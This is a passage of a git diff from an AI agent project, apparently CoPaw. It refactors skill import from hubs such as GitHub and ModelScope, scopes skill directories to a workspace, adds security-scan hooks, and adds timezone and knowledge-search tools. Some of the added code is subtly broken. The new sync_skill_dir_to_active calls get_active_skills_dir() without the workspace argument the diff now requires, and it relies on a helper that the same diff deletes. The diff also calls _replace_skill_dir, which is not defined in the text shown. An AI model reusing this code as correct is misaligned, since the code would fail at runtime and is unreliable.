owner=owner, - repo=repo, - ref=branch, - root=selected_root, - subdir=subdir, - ), - ) - except HTTPError as e: - if getattr(e, "code", 0) != 404: - raise + files.update( + _github_collect_tree_files( + owner=owner, + repo=repo, + ref=branch, + root=selected_root, + ), + ) source_url = f"https://github.com/{owner}/{repo}" return {"name": skill, "files": files}, source_url @@ -1148,20 +1181,14 @@ def _fetch_bundle_from_repo_and_skill_hint( ) files: dict[str, str] = {"SKILL.md": _github_read_file(skill_md_entry)} - for subdir in ("references", "scripts"): - try: - files.update( - _github_collect_tree_files( - owner=owner, - repo=repo, - ref=branch, - root=selected_root, - subdir=subdir, - ), - ) - except HTTPError as e: - if getattr(e, "code", 0) != 404: - raise + files.update( + _github_collect_tree_files( + owner=owner, + repo=repo, + ref=branch, + root=selected_root, + ), + ) source_url = f"https://github.com/{owner}/{repo}" skill_name = skill.split("/")[-1].strip() if skill else repo return {"name": skill_name or repo, "files": files}, source_url @@ -1275,6 +1302,73 @@ def _lobehub_zip_to_bundle(identifier: str, payload: bytes) -> dict[str, Any]: return {"name": skill_name.strip(), "files": files} +def _fetch_bundle_from_modelscope_url( + bundle_url: str, + requested_version: str, +) -> tuple[Any, str]: + spec = _extract_modelscope_skill_spec(bundle_url) + if spec is None: + raise ValueError( + "Invalid ModelScope URL format. Use URL like " + "https://modelscope.cn/skills/@owner/skill-name", + ) + owner, skill_name, version_hint = spec + detail_url = f"https://modelscope.cn/api/v1/skills/@{owner}/{skill_name}" + try: + detail = _http_json_get(detail_url) + except HTTPError as e: + raise ValueError( + "ModelScope skill lookup failed: " + f"{_lobehub_http_error_message(e)}", + ) from e + + payload = detail.get("Data") if isinstance(detail, dict) else None + if not isinstance(payload, dict): + payload = {} + source_url = payload.get("SourceURL") + source_url = source_url.strip() if isinstance(source_url, str) else "" + source_lower = source_url.lower() + preferred_version = requested_version.strip() or version_hint + + if source_url and _is_http_url(source_url): + if "github.com" in source_lower: + bundle, _ = _fetch_bundle_from_github_url( + source_url, + preferred_version, + ) + return bundle, bundle_url + if "clawhub.ai" in source_lower: + clawhub_slug = _resolve_clawhub_slug(source_url) + if clawhub_slug: + try: + bundle, _ = _fetch_bundle_from_clawhub_slug( + clawhub_slug, + preferred_version, + ) + return bundle, bundle_url + except Exception as e: + logger.warning( + "ModelScope source clawhub fetch failed for %s: %s", + source_url, + e, + ) + + readme_content = payload.get("ReadMeContent") + if isinstance(readme_content, str) and readme_content.strip(): + fallback_name = ( + str(payload.get("Name") or skill_name).strip() or skill_name + ) + return { + "name": fallback_name, + "files": {"SKILL.md": readme_content}, + }, bundle_url + + raise ValueError( + "ModelScope skill source is unsupported and ReadMeContent is empty. " + "Please import from the original source URL directly.", + ) + + def _fetch_bundle_from_lobehub_url( bundle_url: str, requested_version: str, @@ -1364,58 +1458,45 @@ def search_hub_skills(query: str, limit: int = 20) -> list[HubSkillResult]: return results +def _resolve_bundle_from_url( + bundle_url: str, + version: str, +) -> tuple[Any, str]: + fetcher: Any | None = None + clawhub_slug = "" + if _extract_skills_sh_spec(bundle_url) is not None: + fetcher = _fetch_bundle_from_skills_sh_url + elif _extract_github_spec(bundle_url) is not None: + fetcher = _fetch_bundle_from_github_url + elif _extract_lobehub_identifier(bundle_url): + fetcher = _fetch_bundle_from_lobehub_url + elif _extract_modelscope_skill_spec(bundle_url) is not None: + fetcher = _fetch_bundle_from_modelscope_url + elif _extract_skillsmp_slug(bundle_url): + fetcher = _fetch_bundle_from_skillsmp_url + else: + clawhub_slug = _resolve_clawhub_slug(bundle_url) + + if fetcher is not None: + return fetcher(bundle_url, requested_version=version) + if clawhub_slug: + return _fetch_bundle_from_clawhub_slug(clawhub_slug, version) + # Backward-compatible fallback for direct bundle JSON URLs. + return _http_json_get(bundle_url), bundle_url + + # pylint: disable-next=too-many-branches def install_skill_from_hub( *, + workspace_dir: Path, bundle_url: str, version: str = "", enable: bool = True, overwrite: bool = False, ) -> HubInstallResult: - source_url = bundle_url - data: Any - if not bundle_url or not _is_http_url(bundle_url): raise ValueError("bundle_url must be a valid http(s) URL") - - skills_spec = _extract_skills_sh_spec(bundle_url) - if skills_spec is not None: - data, source_url = _fetch_bundle_from_skills_sh_url( - bundle_url, - requested_version=version, - ) - else: - github_spec = _extract_github_spec(bundle_url) - if github_spec is not None: - data, source_url = _fetch_bundle_from_github_url( - bundle_url, - requested_version=version, - ) - else: - lobehub_identifier = _extract_lobehub_identifier(bundle_url) - if lobehub_identifier: - data, source_url = _fetch_bundle_from_lobehub_url( - bundle_url, - requested_version=version, - ) - else: - skillsmp_slug = _extract_skillsmp_slug(bundle_url) - if skillsmp_slug: - data, source_url = _fetch_bundle_from_skillsmp_url( - bundle_url, - requested_version=version, - ) - else: - clawhub_slug = _resolve_clawhub_slug(bundle_url) - if clawhub_slug: - data, source_url = _fetch_bundle_from_clawhub_slug( - clawhub_slug, - version, - ) - else: - # Backward-compatible fallback for direct bundle - # JSON URLs. - data = _http_json_get(bundle_url) + data, source_url = _resolve_bundle_from_url(bundle_url, version) name, content, references, scripts, extra_files = _normalize_bundle(data) if not name: @@ -1424,7 +1505,8 @@ def install_skill_from_hub( # Sanitize: "Excel / XLSX" etc. must not be used as dir name name = _sanitize_skill_dir_name(name) - created = SkillService.create_skill( + skill_service = SkillService(workspace_dir) + created = skill_service.create_skill( name=name, content=content, overwrite=overwrite, @@ -1440,7 +1522,7 @@ def install_skill_from_hub( enabled = False if enable: - enabled = SkillService.enable_skill(name, force=True) + enabled = skill_service.enable_skill(name, force=True) if not enabled: logger.warning("Skill '%s' imported but enable failed", name) diff --git a/src/copaw/agents/skills_manager.py b/src/copaw/agents/skills_manager.py index 76ba47d81..396c2f422 100644 --- a/src/copaw/agents/skills_manager.py +++ b/src/copaw/agents/skills_manager.py @@ -1,100 +1,18 @@ # -*- coding: utf-8 -*- """Skills management: sync skills from code to working_dir.""" -import filecmp import logging import shutil -from collections.abc import Iterable -from itertools import zip_longest from pathlib import Path from typing import Any from pydantic import BaseModel import frontmatter +from packaging.version import Version -from ..constant import ACTIVE_SKILLS_DIR, CUSTOMIZED_SKILLS_DIR logger = logging.getLogger(__name__) -IGNORED_RUNTIME_ARTIFACT_NAMES = { - "__pycache__", - ".DS_Store", - "Thumbs.db", - ".pytest_cache", -} -IGNORED_RUNTIME_ARTIFACT_SUFFIXES = { - ".pyc", - ".pyo", -} - - -def _should_ignore_runtime_artifact(path: Path) -> bool: - """Return True for generated runtime files that should not sync.""" - if path.name in IGNORED_RUNTIME_ARTIFACT_NAMES: - return True - if path.is_file() and path.suffix in IGNORED_RUNTIME_ARTIFACT_SUFFIXES: - return True - return False - - -def _iter_relevant_directory_entries( - directory: Path, -) -> Iterable[tuple[Path, Path]]: - """Yield relative paths for non-generated files and directories.""" - if not directory.exists(): - return - - yield from _iter_relevant_directory_entries_from( - root_dir=directory, - current_dir=directory, - ) - - -def _iter_relevant_directory_entries_from( - root_dir: Path, - current_dir: Path, -) -> Iterable[tuple[Path, Path]]: - """Yield sorted non-generated directory entries without buffering.""" - for item in sorted(current_dir.iterdir(), key=lambda path: path.name): - if _should_ignore_runtime_artifact(item): - continue - - yield item.relative_to(root_dir), item - - if item.is_dir(): - yield from _iter_relevant_directory_entries_from( - root_dir=root_dir, - current_dir=item, - ) - - -def _directories_match_ignoring_runtime_artifacts( - dir1: Path, - dir2: Path, -) -> bool: - """Compare two directories while ignoring generated runtime artifacts.""" - if not dir1.exists() or not dir2.exists(): - return False - - for entry1, entry2 in zip_longest( - _iter_relevant_directory_entries(dir1), - _iter_relevant_directory_entries(dir2), - ): - if entry1 is None or entry2 is None: - return False - - relative_path1, left = entry1 - relative_path2, right = entry2 - if relative_path1 != relative_path2: - return False - if left.is_dir() != right.is_dir(): - return False - if left.is_file() and not filecmp.cmp(left, right, shallow=False): - return False - - return True - - def _dedupe_skills_by_name(skills: list["SkillInfo"]) -> list["SkillInfo"]: """Return one skill per name, preferring customized over builtin.""" merged: dict[str, SkillInfo] = {} @@ -143,23 +61,23 @@ def get_builtin_skills_dir() -> Path: return Path(__file__).parent / "skills" -def get_customized_skills_dir() -> Path: - """Get the path to customized skills directory in working_dir.""" - return CUSTOMIZED_SKILLS_DIR +def get_customized_skills_dir(workspace_dir: Path) -> Path: + """Get the path to customized skills directory in workspace_dir.""" + return workspace_dir / "customized_skills" -def get_active_skills_dir() -> Path: - """Get the path to active skills directory in working_dir.""" - return ACTIVE_SKILLS_DIR +def get_active_skills_dir(workspace_dir: Path) -> Path: + """Get the path to active skills directory in workspace_dir.""" + return workspace_dir / "active_skills" -def get_working_skills_dir() -> Path: +def get_working_skills_dir(workspace_dir: Path) -> Path: """ - Get the path to skills directory in working_dir. + Get the path to skills directory in workspace_dir. Deprecated: Use get_active_skills_dir() instead. """ - return get_active_skills_dir() + return get_active_skills_dir(workspace_dir) def _build_directory_tree(directory: Path) -> dict[str, Any]: @@ -217,7 +135,46 @@ def _collect_skills_from_dir(directory: Path) -> dict[str, Path]: return skills +def sync_skill_dir_to_active( + skill_dir: Path, + force: bool = False, +) -> bool: + """Sync a single skill directory into active_skills.""" + skill_md = skill_dir / "SKILL.md" + if not skill_dir.is_dir() or not skill_md.exists(): + logger.warning("Skill directory is invalid or missing SKILL.md: %s", skill_dir) + return False + + active_skills = get_active_skills_dir() + active_skills.mkdir(parents=True, exist_ok=True) + + target_dir = active_skills / skill_dir.name + if target_dir.exists(): + if _directories_match_ignoring_runtime_artifacts(skill_dir, target_dir): + return True + if not force: + logger.debug( + "Skill '%s' already exists in active_skills with different content, skipping.", + skill_dir.name, + ) + return False + shutil.rmtree(target_dir) + + try: + shutil.copytree(skill_dir, target_dir) + logger.debug("Synced skill '%s' to active_skills.", skill_dir.name) + return True + except Exception as e: + logger.error( + "Failed to sync skill directory '%s' to active_skills: %s", + skill_dir, + e, + ) + return False + + def sync_skills_to_working_dir( + workspace_dir: Path, skill_names: list[str] | None = None, force: bool = False, ) -> tuple[int, int]: @@ -225,6 +182,7 @@ def sync_skills_to_working_dir( Sync skills from builtin and customized to active_skills directory. Args: + workspace_dir: Workspace directory path. skill_names: List of skill names to sync. If None, sync all skills. force: If True, overwrite existing skills in active_skills. @@ -232,8 +190,8 @@ def sync_skills_to_working_dir( Tuple of (synced_count, skipped_count). """ builtin_skills = get_builtin_skills_dir() - customized_skills = get_customized_skills_dir() - active_skills = get_active_skills_dir() + customized_skills = get_customized_skills_dir(workspace_dir) + active_skills = get_active_skills_dir(workspace_dir) # Ensure active skills directory exists active_skills.mkdir(parents=True, exist_ok=True) @@ -264,51 +222,46 @@ def sync_skills_to_working_dir( synced_count = 0 skipped_count = 0 - # Sync each skill for skill_name, skill_dir in skills_to_sync.items(): target_dir = active_skills / skill_name - # Check if skill already exists - if target_dir.exists() and not force: + if not target_dir.exists() or force: + _replace_skill_dir(skill_dir, target_dir) logger.debug( - "Skill '%s' already exists in active_skills, skipping. " - "Use force=True to overwrite.", + "Synced skill '%s' to active_skills.", skill_name, ) - skipped_count += 1 + synced_count += 1 continue # Copy skill directory try: - if target_dir.exists(): - shutil.rmtree(target_dir) - shutil.copytree(skill_dir, target_dir) - logger.debug("Synced skill '%s' to active_skills.", skill_name) - synced_count += 1 + if sync_skill_dir_to_active(skill_dir, force=True): + synced_count += 1 + else: + skipped_count += 1 except Exception as e: - logger.error( - "Failed to sync skill '%s': %s", - skill_name, - e, - ) + logger.error("Failed to sync skill '%s': %s", skill_name, e) return synced_count, skipped_count def sync_skills_from_active_to_customized( + workspace_dir: Path, skill_names: list[str] | None = None, ) -> tuple[int, int]: """ Sync skills from active_skills to customized_skills directory. Args: + workspace_dir: Workspace directory path. skill_names: List of skill names to sync. If None, sync all skills. Returns: Tuple of (synced_count, skipped_count). """ - active_skills = get_active_skills_dir() - customized_skills = get_customized_skills_dir() + active_skills = get_active_skills_dir(workspace_dir) + customized_skills = get_customized_skills_dir(workspace_dir) builtin_skills = get_builtin_skills_dir() customized_skills.mkdir(parents=True, exist_ok=True) @@ -327,23 +280,23 @@ def sync_skills_from_active_to_customized( if skill_names is not None and skill_name not in skill_names: continue - if skill_name in builtin_skills_dict: - builtin_skill_dir = builtin_skills_dict[skill_name] - if _directories_match_ignoring_runtime_artifacts( - skill_dir, - builtin_skill_dir, - ): - skipped_count += 1 - continue + # Skip builtin skills (dual check: version field + name match) + active_ver = _get_builtin_skill_version(skill_dir) + if active_ver is not None and skill_name in builtin_skills_dict: + skipped_count += 1 + continue + # Only back-sync when customized doesn't already exist target_dir = customized_skills / skill_name + if target_dir.exists(): + skipped_count += 1 + continue try: - if target_dir.exists(): - shutil.rmtree(target_dir) shutil.copytree(skill_dir, target_dir) logger.debug( - "Synced skill '%s' from active_skills to customized_skills.", + "Synced skill '%s' from active_skills to " + "customized_skills.", skill_name, ) synced_count += 1 @@ -357,14 +310,17 @@ def sync_skills_from_active_to_customized( return synced_count, skipped_count -def list_available_skills() -> list[str]: +def list_available_skills(workspace_dir: Path) -> list[str]: """ List all available skills in active_skills directory. + Args: + workspace_dir: Workspace directory path. + Returns: List of skill names. """ - active_skills = get_active_skills_dir() + active_skills = get_active_skills_dir(workspace_dir) if not active_skills.exists(): return [] @@ -376,16 +332,19 @@ def list_available_skills() -> list[str]: ] -def ensure_skills_initialized() -> None: +def ensure_skills_initialized(workspace_dir: Path) -> None: """ Check if skills are initialized in active_skills directory. + Args: + workspace_dir: Workspace directory path. + Logs a warning if no skills are found, or info about loaded skills. Skills should be configured via `copaw init` or `copaw skills config`. """ - active_skills = get_active_skills_dir() - available = list_available_skills() + active_skills = get_active_skills_dir(workspace_dir) + available = list_available_skills(workspace_dir) if not active_skills.exists() or not available: logger.warning( @@ -532,11 +491,25 @@ class SkillService: """ Service for managing skills. - Manages skills across builtin, customized, and active directories. + Manages skills across builtin, customized, and active directories + for a specific workspace. """ - @staticmethod - def list_all_skills() -> list[SkillInfo]: + def __init__(self, workspace_dir: Path): + """ + Initialize SkillService for a specific workspace. + + Args: + workspace_dir: Path to the workspace directory. + """ + self.workspace_dir = workspace_dir + + def get_customized_skill_dir(self, name: str) -> Path | None: + """Return the Path to a skill inside customized_skills, or None.""" + skill_dir = get_customized_skills_dir(self.workspace_dir) / name + return skill_dir if skill_dir.exists() else None + + def list_all_skills(self) -> list[SkillInfo]: """ List all skills from builtin and customized directories. @@ -544,15 +517,32 @@ def list_all_skills() -> list[SkillInfo]: List of SkillInfo with name, content, source, and path. """ try: - synced, _ = sync_skills_from_active_to_customized() + synced, _ = sync_skills_from_active_to_customized( + self.workspace_dir, + ) + if synced > 0: + logger.debug( + "Back-synced %d skill(s) from active_skills", + synced, + ) + except Exception as e: + logger.debug( + "Failed to back-sync skills: %s", + e, + ) + + try: + synced, _ = sync_skills_to_working_dir( + self.workspace_dir, + ) if synced > 0: logger.debug( - "Synced %d skill(s) from active_skills", + "Forward-synced %d skill(s) to active_skills", synced, ) except Exception as e: logger.debug( - "Failed to sync skills from active_skills: %s", + "Failed to forward-sync skills: %s", e, ) @@ -564,23 +554,28 @@ def list_all_skills() -> list[SkillInfo]: _read_skills_from_dir(get_builtin_skills_dir(), "builtin"), ) skills.extend( - _read_skills_from_dir(get_customized_skills_dir(), "customized"), + _read_skills_from_dir( + get_customized_skills_dir(self.workspace_dir), + "customized", + ), ) return _dedupe_skills_by_name(skills) - @staticmethod - def list_available_skills() -> list[SkillInfo]: + def list_available_skills(self) -> list[SkillInfo]: """ List all available (active) skills in active_skills directory. Returns: List of SkillInfo with name, content, source, and path. """ - return _read_skills_from_dir(get_active_skills_dir(), "active") + return _read_skills_from_dir( + get_active_skills_dir(self.workspace_dir), + "active", + ) - @staticmethod def create_skill( + self, name: str, content: str, overwrite: bool = False, @@ -657,7 +652,7 @@ def create_skill( ) return False - customized_dir = get_customized_skills_dir() + customized_dir = get_customized_skills_dir(self.workspace_dir) customized_dir.mkdir(parents=True, exist_ok=True) skill_dir = customized_dir / name @@ -709,9 +704,31 @@ def create_skill( name, ) + # --- Security scan (post-write) ---------------------------------- + try: + from ..security.skill_scanner import ( + SkillScanError, + scan_skill_directory, + ) + + scan_skill_directory(skill_dir, skill_name=name) + except SkillScanError: + raise + except Exception as scan_exc: + logger.warning( + "Security scan error for skill '%s' (non-fatal): %s", + name, + scan_exc, + ) + # --------------------------------------------------------------- + logger.debug("Created skill '%s' in customized_skills.", name) return True except Exception as e: + from ..security.skill_scanner import SkillScanError + + if isinstance(e, SkillScanError): + raise logger.error( "Failed to create skill '%s': %s", name, @@ -719,8 +736,7 @@ def create_skill( ) return False - @staticmethod - def disable_skill(name: str) -> bool: + def disable_skill(self, name: str) -> bool: """ Disable a skill by removing it from active_skills directory. @@ -730,7 +746,7 @@ def disable_skill(name: str) -> bool: Returns: True if skill was disabled successfully, False otherwise. """ - active_dir = get_active_skills_dir() + active_dir = get_active_skills_dir(self.workspace_dir) skill_dir = active_dir / name if not skill_dir.exists(): @@ -752,11 +768,14 @@ def disable_skill(name: str) -> bool: ) return False - @staticmethod - def enable_skill(name: str, force: bool = False) -> bool: + def enable_skill(self, name: str, force: bool = False) -> bool: """ Enable a skill by syncing it to active_skills directory. + Before syncing the skill runs through a security scan. + Blocking behaviour is controlled by the scanner mode in + config (``security.skill_scanner.mode``). + Args: name: Skill name to enable. force: If True, overwrite existing skill in active_skills. @@ -764,13 +783,41 @@ def enable_skill(name: str, force: bool = False) -> bool: Returns: True if skill was enabled successfully, False otherwise. """ - sync_skills_to_working_dir(skill_names=[name], force=force) + # --- Security scan (pre-activation) -------------------------------- + try: + from ..security.skill_scanner import ( + SkillScanError, + scan_skill_directory, + ) + + source_dir = self.get_customized_skill_dir(name) + if source_dir is None: + builtin = get_builtin_skills_dir() / name + if builtin.is_dir(): + source_dir = builtin + + if source_dir is not None: + scan_skill_directory(source_dir, skill_name=name) + except SkillScanError: + raise + except Exception as scan_exc: + logger.warning( + "Security scan error for skill '%s' (non-fatal): %s", + name, + scan_exc, + ) + # ------------------------------------------------------------------- + + sync_skills_to_working_dir( + self.workspace_dir, + skill_names=[name], + force=force, + ) # Check if skill was actually synced - active_dir = get_active_skills_dir() + active_dir = get_active_skills_dir(self.workspace_dir) return (active_dir / name).exists() - @staticmethod - def delete_skill(name: str) -> bool: + def delete_skill(self, name: str) -> bool: """ Delete a skill from customized_skills directory permanently. @@ -785,7 +832,7 @@ def delete_skill(name: str) -> bool: Returns: True if skill was deleted successfully, False otherwise. """ - customized_dir = get_customized_skills_dir() + customized_dir = get_customized_skills_dir(self.workspace_dir) skill_dir = customized_dir / name if not skill_dir.exists(): @@ -810,8 +857,8 @@ def delete_skill(name: str) -> bool: ) return False - @staticmethod def sync_from_active_to_customized( + self, skill_names: list[str] | None = None, ) -> tuple[int, int]: """ @@ -824,11 +871,12 @@ def sync_from_active_to_customized( Tuple of (synced_count, skipped_count). """ return sync_skills_from_active_to_customized( + self.workspace_dir, skill_names=skill_names, ) - @staticmethod def load_skill_file( # pylint: disable=too-many-return-statements + self, skill_name: str, file_path: str, source: str, @@ -892,7 +940,7 @@ def load_skill_file( # pylint: disable=too-many-return-statements # Get source directory if source == "customized": - base_dir = get_customized_skills_dir() + base_dir = get_customized_skills_dir(self.workspace_dir) else: # builtin base_dir = get_builtin_skills_dir() diff --git a/src/copaw/agents/tool_guard_mixin.py b/src/copaw/agents/tool_guard_mixin.py index 472d000ca..5053bc573 100644 --- a/src/copaw/agents/tool_guard_mixin.py +++ b/src/copaw/agents/tool_guard_mixin.py @@ -343,9 +343,6 @@ async def _reasoning( await self.memory.add(msg) return msg - if tool_choice is None and self.toolkit.get_json_schemas(): - tool_choice = "auto" - return await super()._reasoning( # type: ignore[misc] tool_choice=tool_choice, ) diff --git a/src/copaw/agents/tools/__init__.py b/src/copaw/agents/tools/__init__.py index 70b32c6da..d9c717e6e 100644 --- a/src/copaw/agents/tools/__init__.py +++ b/src/copaw/agents/tools/__init__.py @@ -19,9 +19,15 @@ from .send_file import send_file_to_user from .browser_control import browser_use from .desktop_screenshot import desktop_screenshot +from .view_image import view_image from .memory_search import create_memory_search_tool -from .get_current_time import get_current_time +from .get_current_time import get_current_time, set_user_timezone from .get_token_usage import get_token_usage +from .knowledge_search import knowledge_search +from .graph_query import graph_query +from .memify_run import memify_run +from .memify_status import memify_status +from .triplet_focus_search import triplet_focus_search __all__ = [ "execute_python_code", @@ -36,8 +42,15 @@ "glob_search", "send_file_to_user", "desktop_screenshot", + "view_image", "browser_use", "create_memory_search_tool", "get_current_time", + "set_user_timezone", "get_token_usage", + "knowledge_search", + "graph_query", + "memify_run", + "memify_status", + "triplet_focus_search", ] diff --git a/src/copaw/agents/tools/browser_control.py b/src/copaw/agents/tools/browser_control.py index 2ee73d7d7..25e29ef55 100644 --- a/src/copaw/agents/tools/browser_control.py +++ b/src/copaw/agents/tools/browser_control.py @@ -11,13 +11,13 @@ import asyncio import atexit +from concurrent import futures import json import logging import os import subprocess import sys import time -from concurrent.futures import ThreadPoolExecutor from typing import Any, Optional from agentscope.message import TextBlock @@ -41,12 +41,12 @@ ) if _USE_SYNC_PLAYWRIGHT: - _executor: Optional[ThreadPoolExecutor] = None + _executor: Optional[futures.ThreadPoolExecutor] = None - def _get_executor() -> ThreadPoolExecutor: + def _get_executor() -> futures.ThreadPoolExecutor: global _executor if _executor is None: - _executor = ThreadPoolExecutor( + _executor = futures.ThreadPoolExecutor( max_workers=1, thread_name_prefix="playwright", ) diff --git a/src/copaw/agents/tools/file_io.py b/src/copaw/agents/tools/file_io.py index 1e8040412..237d38ad3 100644 --- a/src/copaw/agents/tools/file_io.py +++ b/src/copaw/agents/tools/file_io.py @@ -9,12 +9,13 @@ from agentscope.tool import ToolResponse from ...constant import WORKING_DIR +from ...config.context import get_current_workspace_dir from .utils import truncate_file_output, read_file_safe def _resolve_file_path(file_path: str) -> str: """Resolve file path: use absolute path as-is, - resolve relative path from WORKING_DIR. + resolve relative path from current workspace or WORKING_DIR. Args: file_path: The input file path (absolute or relative). @@ -26,7 +27,9 @@ def _resolve_file_path(file_path: str) -> str: if path.is_absolute(): return str(path) else: - return str(WORKING_DIR / file_path) + # Use current workspace_dir from context, fallback to WORKING_DIR + workspace_dir = get_current_workspace_dir() or WORKING_DIR + return str(workspace_dir / file_path) async def read_file( # pylint: disable=too-many-return-statements diff --git a/src/copaw/agents/tools/file_search.py b/src/copaw/agents/tools/file_search.py index 12bcdae0d..330c5a722 100644 --- a/src/copaw/agents/tools/file_search.py +++ b/src/copaw/agents/tools/file_search.py @@ -11,6 +11,7 @@ from agentscope.tool import ToolResponse from ...constant import WORKING_DIR +from ...config.context import get_current_workspace_dir from .file_io import _resolve_file_path # Skip binary / large files @@ -112,7 +113,11 @@ async def grep_search( # pylint: disable=too-many-branches ], ) - search_root = Path(_resolve_file_path(path)) if path else WORKING_DIR + search_root = ( + Path(_resolve_file_path(path)) + if path + else (get_current_workspace_dir() or WORKING_DIR) + ) if not search_root.exists(): return ToolResponse( @@ -236,7 +241,11 @@ async def glob_search( ], ) - search_root = Path(_resolve_file_path(path)) if path else WORKING_DIR + search_root = ( + Path(_resolve_file_path(path)) + if path + else (get_current_workspace_dir() or WORKING_DIR) + ) if not search_root.exists(): return ToolResponse( diff --git a/src/copaw/agents/tools/get_current_time.py b/src/copaw/agents/tools/get_current_time.py index 5bd25be6b..d815681ff 100644 --- a/src/copaw/agents/tools/get_current_time.py +++ b/src/copaw/agents/tools/get_current_time.py @@ -1,25 +1,39 @@ # -*- coding: utf-8 -*- -"""Tool that returns the current UTC time.""" +"""Tools for getting and setting the user timezone.""" +import logging from datetime import datetime, timezone +from zoneinfo import ZoneInfo, ZoneInfoNotFoundError from agentscope.message import TextBlock from agentscope.tool import ToolResponse +from ...config import load_config, save_config + +logger = logging.getLogger(__name__) -async def get_current_time() -> ToolResponse: - """Get the current UTC time. - Returns the current time in UTC in a human-readable format. - Useful for time-sensitive tasks such as scheduling cron jobs. +async def get_current_time() -> ToolResponse: + """Get the current time. + Only call this tool when the user explicitly asks for the time. Returns: `ToolResponse`: - The current UTC time string, - e.g. "2026-02-13 11:30:45 UTC (Friday)". + The current time string, + e.g. "2026-02-13 19:30:45 Asia/Shanghai (Friday)". """ - now = datetime.now(timezone.utc) - time_str = now.strftime("%Y-%m-%d %H:%M:%S UTC (%A)") + user_tz = load_config().user_timezone or "UTC" + try: + now = datetime.now(ZoneInfo(user_tz)) + except (ZoneInfoNotFoundError, KeyError): + logger.warning("Invalid timezone %r, falling back to UTC", user_tz) + now = datetime.now(timezone.utc) + user_tz = "UTC" + + time_str = ( + f"{now.strftime('%Y-%m-%d %H:%M:%S')} " + f"{user_tz} ({now.strftime('%A')})" + ) return ToolResponse( content=[ @@ -29,3 +43,50 @@ async def get_current_time() -> ToolResponse: ), ], ) + + +async def set_user_timezone(timezone_name: str) -> ToolResponse: + """Set the user timezone. + Only call this tool when the user explicitly asks to change their timezone. + + Args: + timezone_name: IANA timezone name (e.g. "Asia/Shanghai", + "America/New_York", "Europe/London", "UTC"). + + Returns: + `ToolResponse`: Confirmation with the new timezone and current time. + """ + tz_name = timezone_name.strip() + if not tz_name: + return ToolResponse( + content=[TextBlock(type="text", text="Error: timezone is empty.")], + ) + + try: + now = datetime.now(ZoneInfo(tz_name)) + except (ZoneInfoNotFoundError, KeyError): + return ToolResponse( + content=[ + TextBlock( + type="text", + text=f"Error: invalid timezone '{tz_name}'.", + ), + ], + ) + + config = load_config() + config.user_timezone = tz_name + save_config(config) + + time_str = ( + f"{now.strftime('%Y-%m-%d %H:%M:%S')} " + f"{tz_name} ({now.strftime('%A')})" + ) + return ToolResponse( + content=[ + TextBlock( + type="text", + text=f"Timezone set to {tz_name}. Current time: {time_str}", + ), + ], + ) diff --git a/src/copaw/agents/tools/graph_query.py b/src/copaw/agents/tools/graph_query.py new file mode 100644 index 000000000..0b8ac3d1e --- /dev/null +++ b/src/copaw/agents/tools/graph_query.py @@ -0,0 +1,97 @@ +# -*- coding: utf-8 -*- +"""Tool to execute graph-oriented knowledge queries.""" + +from __future__ import annotations + +import json + +from agentscope.message import TextBlock +from agentscope.tool import ToolResponse + +from ...config import load_config +from ...constant import WORKING_DIR +from ...knowledge.graph_ops import GraphOpsManager + + +async def graph_query( + query_text: str, + query_mode: str = "template", + dataset_scope: list[str] | None = None, + top_k: int = 10, + timeout_sec: int = 20, +) -> ToolResponse: + """Run graph-style query and return normalized records. + + Args: + query_text: Text query or cypher query body. + query_mode: One of "template" or "cypher". + dataset_scope: Optional dataset names/ids for scoping. + top_k: Maximum number of records to return. + timeout_sec: Query timeout for backend provider. + """ + text = (query_text or "").strip() + if not text: + return ToolResponse( + content=[TextBlock(type="text", text="Error: query_text cannot be empty.")], + ) + + mode = (query_mode or "template").strip().lower() + if mode not in {"template", "cypher"}: + return ToolResponse( + content=[ + TextBlock( + type="text", + text="Error: query_mode must be 'template' or 'cypher'.", + ) + ], + ) + + config = load_config() + if not getattr(config, "knowledge", None) or not config.knowledge.enabled: + return ToolResponse( + content=[ + TextBlock(type="text", text="Error: knowledge is disabled in configuration."), + ], + ) + if not bool(getattr(config.agents.running, "knowledge_enabled", True)): + return ToolResponse( + content=[ + TextBlock(type="text", text="Error: knowledge is disabled in agent runtime configuration."), + ], + ) + if not bool(getattr(config.knowledge, "graph_query_enabled", False)): + return ToolResponse( + content=[ + TextBlock(type="text", text="Error: graph query is disabled in configuration."), + ], + ) + if mode == "cypher" and not bool(getattr(config.knowledge, "allow_cypher_query", False)): + return ToolResponse( + content=[ + TextBlock(type="text", text="Error: cypher query is not allowed by configuration."), + ], + ) + + try: + manager = GraphOpsManager(WORKING_DIR) + result = manager.graph_query( + config=config.knowledge, + query_mode=mode, + query_text=text, + dataset_scope=dataset_scope, + top_k=max(1, min(int(top_k), 50)), + timeout_sec=max(1, min(int(timeout_sec), 120)), + ) + payload = { + "records": result.records, + "summary": result.summary, + "provenance": result.provenance, + "warnings": result.warnings, + } + return ToolResponse( + content=[TextBlock(type="text", text=json.dumps(payload, ensure_ascii=False, indent=2))], + ) + except Exception as e: + return ToolResponse( + content=[TextBlock(type="text", text=f"Error: graph query failed due to\n{e}")], + ) \ No newline at end of file diff --git a/src/copaw/agents/tools/knowledge_search.py b/src/copaw/agents/tools/knowledge_search.py new file mode 100644 index 000000000..4288eb86d --- /dev/null +++ b/src/copaw/agents/tools/knowledge_search.py @@ -0,0 +1,135 @@ +# -*- coding: utf-8 -*- +"""Tool to search indexed knowledge chunks.""" + +from agentscope.message import TextBlock +from agentscope.tool import ToolResponse + +from ...config import load_config +from ...constant import WORKING_DIR +from ...knowledge import KnowledgeManager + + +async def knowledge_search( + query: str, + max_results: int = 5, + min_score: float = 1.0, + source_types: list[str] | None = None, +) -> ToolResponse: + """Search knowledge sources and return the top matched snippets. + + Use this tool when you need project-specific facts from indexed + knowledge sources instead of guessing from memory. + + Args: + query: Search query text. + max_results: Maximum number of hits to return. + min_score: Minimum lexical score required for a hit. + source_types: Optional source type filter, e.g. ["file", "url"]. + + Returns: + ToolResponse with formatted hit summaries. + """ + query_text = (query or "").strip() + if not query_text: + return ToolResponse( + content=[ + TextBlock( + type="text", + text="Error: query cannot be empty.", + ), + ], + ) + + try: + config = load_config() + if not getattr(config, "knowledge", None) or not config.knowledge.enabled: + return ToolResponse( + content=[ + TextBlock( + type="text", + text="Knowledge is disabled in configuration.", + ), + ], + ) + if not bool(getattr(config.agents.running, "knowledge_enabled", True)): + return ToolResponse( + content=[ + TextBlock( + type="text", + text="Knowledge is disabled in agent runtime configuration.", + ), + ], + ) + if not bool( + getattr( + getattr(config, "agents", None), + "running", + None, + ) + and getattr(config.agents.running, "knowledge_retrieval_enabled", True) + ): + return ToolResponse( + content=[ + TextBlock( + type="text", + 